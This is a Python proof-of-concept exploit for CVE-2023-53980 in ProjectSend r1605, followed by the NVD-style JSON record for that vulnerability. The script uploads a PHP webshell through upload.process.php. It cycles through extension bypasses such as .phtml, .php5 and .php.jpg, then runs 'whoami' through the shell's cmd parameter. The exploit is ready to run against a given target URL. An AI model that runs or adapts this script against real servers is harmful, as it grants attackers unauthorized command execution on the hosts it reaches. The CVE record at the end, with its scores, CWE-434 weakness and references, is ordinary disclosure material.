CVE-2023-53980

import requests import sys # CVE-2023-53980 PoC - ProjectSend RCE via File Extension Manipulation # Target: ProjectSend r1605 and earlier versions def exploit(target_url, file_path, filename): """ Exploit for ProjectSend remote code execution via file upload Args: target_url: Base URL of the vulnerable ProjectSend instance file_path: Path to the PHP webshell to upload filename: Filename to use for upload (try .phtml or double extension) """ upload_url = f"{target_url}/upload.process.php" # Try different file extensions to bypass validation extensions = ['.php', '.phtml', '.php5', '.php3', '.php.jpg', '.shell.php.jpg'] for ext in extensions: try: files = { 'file': (filename + ext, open(file_path, 'rb'), 'application/x-php') } data = { 'MAX_FILE_SIZE': '1048576', 'Filename': filename + ext } response = requests.post(upload_url, files=files, data=data, timeout=10) # Check if upload was successful if response.status_code == 200: uploaded_path = f"{target_url}/uploads/files/{filename}{ext}" print(f"[+] File uploaded successfully: {uploaded_path}") # Execute command via webshell cmd_url = f"{uploaded_path}?cmd=whoami" exec_response = requests.get(cmd_url, timeout=10) if exec_response.status_code == 200: print(f"[+] RCE Successful! Output: {exec_response.text}") return True except Exception as e: print(f"[-] Error with extension {ext}: {str(e)}") continue return False if __name__ == "__main__": if len(sys.argv) < 4: print("Usage: python cve-2023-53980.py <target_url> <webshell_path> ") print("Example: python cve-2023-53980.py http://target.com /tmp/shell.php malicious") sys.exit(1) target = sys.argv[1] shell_path = sys.argv[2] filename = sys.argv[3] exploit(target, shell_path, filename)

{"cve": {"id": "CVE-2023-53980", "sourceIdentifier": "[email protected]", "published": "2025-12-22T22:16:03.710", "lastModified": "2025-12-26T15:40:38.417", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ProjectSend r1605 contains a remote code execution vulnerability that allows attackers to upload malicious files by manipulating file extensions. Attackers can upload shell scripts with disguised extensions through the upload.process.php endpoint to execute arbitrary commands on the server."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:projectsend:projectsend:r1605:*:*:*:*:*:*:*", "matchCriteriaId": "1ECB1397-1B02-4C9C-90B4-8D1D22CC9BB9"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/51238", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.projectsend.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/projectsend-remote-code-execution-via-file-extension-manipulation", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}, {"url": "https://www.exploit-db.com/exploits/51238", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}